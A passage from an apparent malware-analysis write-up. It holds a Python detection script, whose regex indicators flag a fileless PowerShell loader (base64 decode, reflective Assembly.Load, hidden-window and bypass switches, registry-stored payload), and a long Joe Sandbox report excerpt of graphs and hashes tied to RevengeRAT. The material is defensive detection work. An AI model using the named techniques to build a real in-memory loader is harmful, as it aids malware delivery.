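# switches, so "-ex bypass" and "-w hidden" are matched as well as the long forms.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-ex\w*\s+bypass", re.I),
    "hidden_window": re.compile(r"-w\w*\s+hidden", re.I),
    "base64_decode": re.compile(r"FromBase64String\s*\(", re.I),
    "reflective_load": re.compile(r"GetDomain\(\)\.Load\(|Reflection\.Assembly\]::Load\(", re.I),
    "entrypoint_invoke": re.compile(r"EntryPoint\.invoke\s*\(", re.I),
    "registry_read": re.compile(r"get-itemproperty|GetValue\s*\(", re.I),
}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
# Where the payload lives: the -Path / -Name pair of the get-itemproperty call.
REG_SOURCE = re.compile(
    r"get-itemproperty\s+-path\s+'(?P<key>[^']+)'\s+-name\s+'(?P<name>[^']+)'", re.I)


def score_event(ev):
    """Return severity, the indicator names that fired, and the registry (key, value)
    holding the payload when the command line names one."""
    cl = ev["CommandLine"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cl)]
    if ev["ParentImage"].rsplit("\\", 1)[-1].lower() in SCRIPT_HOSTS:
        hits.append("script_host_parent")
    m = REG_SOURCE.search(cl)
    payload = (m.group("key"), m.group("name")) if m else None
    if "base64_decode" in hits and ("reflective_load" in hits or "entrypoint_invoke" in hits):
        severity = "high"      # decode-then-load in memory: fileless .NET loader
    elif hits:
        severity = "medium"    # evasion switches or a script-host parent on their own
    else:
        severity = "none"
    return {"severity": severity, "hits": hits, "payload": payload}


if __name__ == "__main__":
    for ev in EVENTS:
        r = score_event(ev)
        print(f"{r['severity']:6} {ev['ParentImage'].rsplit(chr(92), 1)[-1]} -> powershell "
              f"hits={r['hits']} payload={r['payload']}")
```

The extracted `(key, name)` pair is the hand-off to host triage: read that value, base64-decode it and check for an `MZ` header and the `PE\0\0` signature at the offset stored at 0x3C, then hash the decoded bytes for comparison with the RevengeRAT memory dumps listed under the Yara matches. Note the severity logic deliberately does not depend on `-ExecutionPolicy Bypass` or `-windowstyle hidden`; those are trivially dropped by an operator, whereas decode-then-`Load` is the technique itself.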

                                  Target ID:2
                                  Start time:10:42:00
                                  Start date:19/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false


                                    Execution Graph

                                    Execution Coverage:6.8%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:12
                                    Total number of Limit Nodes:1
execution_graph (node id, address, API where resolved; arrows are edges):
15218 7ffd9b8b94c5 -> 15219 7ffd9b8b94cb GetVolumeInformationA -> 15221 7ffd9b8b9696
15209 7ffd9b8bff19 -> 15210 7ffd9b8bff2b -> 15214 7ffd9b8b47a0 -> 15215 7ffd9b8b47a9 GetFileType -> 15217 7ffd9b8bff69
15209 7ffd9b8bff19 -> 15212 7ffd9b8bfed9
15222 7ffd9b8bffff -> 15223 7ffd9b8c0007 CreateFileW -> 15225 7ffd9b8c00fe

                                    Control-flow Graph

control_flow_graph: function at 7ffd9b8b8d18 (basic-block edge list, rendered in the original as a graph with executed and not-executed blocks colour-coded). Internal calls from this function: 7ffd9b8b8d78, 7ffd9b8b8d98, 7ffd9b8b47f0, 7ffd9b8ba4d0, 7ffd9b8ba480, 7ffd9b8ba498, 7ffd9b8bf94c, 7ffd9b8b2ed8.
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -V_L$5K_H$d
                                    • API String ID: 0-1475000724
                                    • Opcode ID: 147e281bd4afd81baff9e9d8729cbdef12a3ad2bf59f40ac0ad6add7694c8e02
                                    • Instruction ID: 9cadba806c6aebd9faa92b54e50321987eec7db013f91836c1bd08d6c3aa1170
                                    • Opcode Fuzzy Hash: 147e281bd4afd81baff9e9d8729cbdef12a3ad2bf59f40ac0ad6add7694c8e02
                                    • Instruction Fuzzy Hash: E8A24871F0EA8A4FE76DDB3884659B577E1EF59300B0541BED05EC71B7DE28A8428B80

                                    Control-flow Graph

control_flow_graph: function at 7ffd9b8c4001 (basic-block edge list, rendered in the original as a graph with executed and not-executed blocks colour-coded). Internal call from this function: 7ffd9b8c4444.
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 06334fca3ffbf649be1295d75a291eef967fc294c308f7497fefdb9380f5c6f5
                                    • Instruction ID: d949ec324ff4b6eda6a021a05c2e83eff63402126f2b852e3a579e9128005f52
                                    • Opcode Fuzzy Hash: 06334fca3ffbf649be1295d75a291eef967fc294c308f7497fefdb9380f5c6f5
                                    • Instruction Fuzzy Hash: A5D18270A18A4E8FEBA8EF28C8557F977D1FB58310F14426ED84DC7295DF3499848B81
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 939a53b085306ff772deb0b9e23240f7c3acd799d276131481451f4782634e9e
                                    • Instruction ID: 839128c46e2572569a0a8603c18350b6ef154ebdb71601a93bf33c4622830866
                                    • Opcode Fuzzy Hash: 939a53b085306ff772deb0b9e23240f7c3acd799d276131481451f4782634e9e
                                    • Instruction Fuzzy Hash: A6D18270A18A4D8FEBA8EF28C8657F977D1FB58310F55826ED80DC7295CF7499808B81

                                    Control-flow Graph

control_flow_graph: function at 7ffd9b8b94c5 (basic-block edge list, rendered in the original as a graph with executed and not-executed blocks colour-coded). Calls GetVolumeInformationA in block 7ffd9b8b94ce-7ffd9b8b9694; internal call to 7ffd9b8b9732.
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: InformationVolume
                                    • String ID:
                                    • API String ID: 2039140958-0
                                    • Opcode ID: c1e2cf34d8b2e7c9b595c739cbd229de3d0e4cd002b4ecdc905802b976a30f45
                                    • Instruction ID: aeb5cd1577f4ad905b5c19d452fc4187253e47897bf7e65e33ca4fdd86b26281
                                    • Opcode Fuzzy Hash: c1e2cf34d8b2e7c9b595c739cbd229de3d0e4cd002b4ecdc905802b976a30f45
                                    • Instruction Fuzzy Hash: 24817330A18A5C8FDB98DF58D855BE9BBF1FF99300F1081AAD04DD3295CA34A985CF81

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 3f68956717f024374b7e7df7f3eee17fe26f3cd209c19a208ca942e2a5557349
                                    • Instruction ID: 38f53109bc01afc8c24add0c0640bae0474dfc9764fe79e8210c4deb7f994d3e
                                    • Opcode Fuzzy Hash: 3f68956717f024374b7e7df7f3eee17fe26f3cd209c19a208ca942e2a5557349
                                    • Instruction Fuzzy Hash: 7F517072A0FA9C4FEB19976C98562B97FE0EF56320F0442BFD099C71E3D9556806C780

                                    Control-flow Graph

control_flow_graph: function at 7ffd9b8bffff (basic-block edge list, rendered in the original as a graph with executed and not-executed blocks colour-coded). Calls CreateFileW in block 7ffd9b8c009d-7ffd9b8c00fc.
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 87e5e688b990ffd5d9da5e3826339286535a8773c2c8cf4f3f17fc9daab604de
                                    • Instruction ID: 6d7a5cd72f8487371a630a972ed386ceb11e9e4362b9a0411c5c1fbbc691e24b
                                    • Opcode Fuzzy Hash: 87e5e688b990ffd5d9da5e3826339286535a8773c2c8cf4f3f17fc9daab604de
                                    • Instruction Fuzzy Hash: 4741B131A1CA5C8FDB58EF58D845AF9BBE0FF69721F04426FE049D3252DB34A8058B81

                                    Control-flow Graph

control_flow_graph: function at 7ffd9b8b47a0 (basic-block edge list, rendered in the original as a graph with executed and not-executed blocks colour-coded). Calls GetFileType in block 7ffd9b8b47a0-7ffd9b9077b2.
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 713d7d7928db1f3580a9e0ac501b3b9310b8f53a3e2ebebc14327bf16e0ae0a9
                                    • Instruction ID: 8bccffd5f1c5e9283f39b4f163200a39c6b7952c1b70726885c47d42eb420786
                                    • Opcode Fuzzy Hash: 713d7d7928db1f3580a9e0ac501b3b9310b8f53a3e2ebebc14327bf16e0ae0a9
                                    • Instruction Fuzzy Hash: 4521D771A0CA0C9FDB58DBA8C8097B97BE1FB59320F10416FD049D3291DB756806CB91

                                    Control-flow Graph

control_flow_graph: function at 7ffd9b9816bd (basic-block edge list, rendered in the original as a graph with executed and not-executed blocks colour-coded). No API or internal calls are resolved in this graph.
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9767a20cb7f1a96b305346a31a3c8f8dac135057721fc2ec96b034daf1c39aeb
                                    • Instruction ID: c2f80d275ebb2514a9196b6c90359277b64b1b4481c3ec97535ca563ab04dd17
                                    • Opcode Fuzzy Hash: 9767a20cb7f1a96b305346a31a3c8f8dac135057721fc2ec96b034daf1c39aeb
                                    • Instruction Fuzzy Hash: 42F15D71A1EB991FD766C76898215B47FE0EF5A314B0A02FFD08DC71B3DA299906C381

                                    Control-flow Graph
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 53f7933a3687e5b9a421f57b33f37d423614ed53851824e838c8007ca9e095a3
                                    • Instruction ID: 3c2c821fe09db9bd5129bcbcdc0c66357090b89f4bf48974bd3ad625e2f417c0
                                    • Opcode Fuzzy Hash: 53f7933a3687e5b9a421f57b33f37d423614ed53851824e838c8007ca9e095a3
                                    • Instruction Fuzzy Hash: D4D13722B1FF8D2FE7A9966C58665743BD1EF55210B0901FEE44DC71E3EE28AD068341
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6f0c040f395a5c62bb40e7e0b17778bd8b41f82dfbbc32a80830058807ba107d
                                    • Instruction ID: fdd0d47febe458cc72e3862a49610fedd5d6dfa93175696d59268e308285277b
                                    • Opcode Fuzzy Hash: 6f0c040f395a5c62bb40e7e0b17778bd8b41f82dfbbc32a80830058807ba107d
                                    • Instruction Fuzzy Hash: 0DA14722B1EE9D1FE7B6966C58345B43BE1EF9A214B0A01FBD05DCB1E3DD28AD058341
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4c1155cb50be676654046194aa090067259c67e57d2bb1abc8cef7491467b21c
                                    • Instruction ID: ff36593a87f8de10cbce36fcc70979105ffc8a97ef7a79d850154e6143646e7b
                                    • Opcode Fuzzy Hash: 4c1155cb50be676654046194aa090067259c67e57d2bb1abc8cef7491467b21c
                                    • Instruction Fuzzy Hash: 3F715631A2DE5C5FE7A8DB2898656B837D1EF9D318F06027ED04DC31A2DE35A8428381
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 82dfc0d55599939c30a2ea7ee60f8e5d7e5487a0c1cf70212cc9d4bfd7b022a9
                                    • Instruction ID: 091481e5f3e45493cc3be078525b135742b43ef6352a1c21bba7f51ba44e205a
                                    • Opcode Fuzzy Hash: 82dfc0d55599939c30a2ea7ee60f8e5d7e5487a0c1cf70212cc9d4bfd7b022a9
                                    • Instruction Fuzzy Hash: F2416A23F2FE6E1BE7B4926C08742B427C1EF8C615F4A017AD45DCB1E6DD28AD024241
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2982458225.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ab5d4fbf8fafa3817a4566bb3a1d689198f61f0d61a2db4a30c83a6b73aee1bc
                                    • Instruction ID: 9f7acf902304bb5422b0ef6c7aea03ff97e1f574fc2b6117a98304005b27ccd1
                                    • Opcode Fuzzy Hash: ab5d4fbf8fafa3817a4566bb3a1d689198f61f0d61a2db4a30c83a6b73aee1bc
                                    • Instruction Fuzzy Hash: DE21F813F2FE5D2BE7B9926C283517427C1EF44A14B4A02BAF45DC71E3ED286D064142
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: }$?N_H
                                    • API String ID: 0-2384390316
                                    • Opcode ID: 239c23c4b251aefea78222a826cd0bacf9a95f90a822f1854e17cd8c46b354c0
                                    • Instruction ID: a254526ab02aa4ea1fcf851aa0a44cba72d2dafda4db411d87f3c9689ca5692c
                                    • Opcode Fuzzy Hash: 239c23c4b251aefea78222a826cd0bacf9a95f90a822f1854e17cd8c46b354c0
                                    • Instruction Fuzzy Hash: E7425A61B0D7894FD71AAB6898255F57BE0EF9A314F0942FBD089CB1E3DD18AC46C381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: -V_L
                                    • API String ID: 0-1499772637
                                    • Opcode ID: 66aab10ab021f2ee296efb39bb82a9ffb7f5ff018284d00dd8536bd8066745cd
                                    • Instruction ID: f5248400df10f2e319937eb46188c38d5224d2058dc840656e6b744b6eefff86
                                    • Opcode Fuzzy Hash: 66aab10ab021f2ee296efb39bb82a9ffb7f5ff018284d00dd8536bd8066745cd
                                    • Instruction Fuzzy Hash: 0791E561F0DA494FEBACDB789864A7477D2EFA9340B0641BED01DC72F2DD29AC418780
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 76ace900d80aa05dba7593c9b8f5d62424dc1a56b2b127a38141942320c1cd24
                                    • Instruction ID: 0a074c6ec28602422e00bf728514f0e848bdffd71475add8bb52ce8d1dd52809
                                    • Opcode Fuzzy Hash: 76ace900d80aa05dba7593c9b8f5d62424dc1a56b2b127a38141942320c1cd24
                                    • Instruction Fuzzy Hash: E242E431B1DA494BEBACAB5C94656B573D2FF98300F0141BDE44EC36E3EE35A9028681
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3f3ef12ef55af974522dd1bd0a02968194ac43c5440aaf208986987eda45e007
                                    • Instruction ID: 7c5edae63c327a17d1afe98d3855d1b22c1583cbcc8c17db78f201e1c04f6a6d
                                    • Opcode Fuzzy Hash: 3f3ef12ef55af974522dd1bd0a02968194ac43c5440aaf208986987eda45e007
                                    • Instruction Fuzzy Hash: 8432C470B1DA0D4FEBA8EB5C9465A7977E2FF98350F0502BAE44DC72A6DE24EC418740
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2981823478.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_7ffd9b8b0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2491b9767a9ae61a04416cc5ffe5493617fa883a08a3d83b84c5c2db4036ae89
                                    • Instruction ID: eb0f4357a9a64a5af29e98c4e61363fde7e635bcc78b737981f652c6cdf8322e
                                    • Opcode Fuzzy Hash: 2491b9767a9ae61a04416cc5ffe5493617fa883a08a3d83b84c5c2db4036ae89
                                    • Instruction Fuzzy Hash: 29F10431B0DA0A4FD768EB68D455AB577E1EF99310F1042BED44DC72A6EE24AC42C781